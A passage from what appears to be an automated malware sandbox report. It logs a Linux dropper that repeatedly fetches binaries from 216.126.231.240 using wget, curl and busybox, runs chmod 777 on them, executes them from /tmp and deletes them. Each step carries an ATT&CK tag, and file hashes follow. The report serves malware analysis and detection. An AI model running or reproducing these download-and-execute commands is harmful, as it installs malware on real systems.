- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:922
-
-
/bin/chmodchmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:925
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:926
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:928
-
-
/bin/chmodchmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:931
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:932
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:934
-
-
/bin/chmodchmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:937
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:938
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:940
-
-
/bin/chmodchmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:943
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:944
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:946
-
-
/bin/chmodchmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:949
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:950
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:952
-
-
/bin/chmodchmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:955
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:956
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:958
-
-
/bin/chmodchmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:961
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:966
-
-
/bin/rmrm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:968
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:970
-
-
/bin/chmodchmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:973
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:974
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:976
-
-
/bin/chmodchmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:979
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:980
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:982
-
-
/bin/chmodchmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:985
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97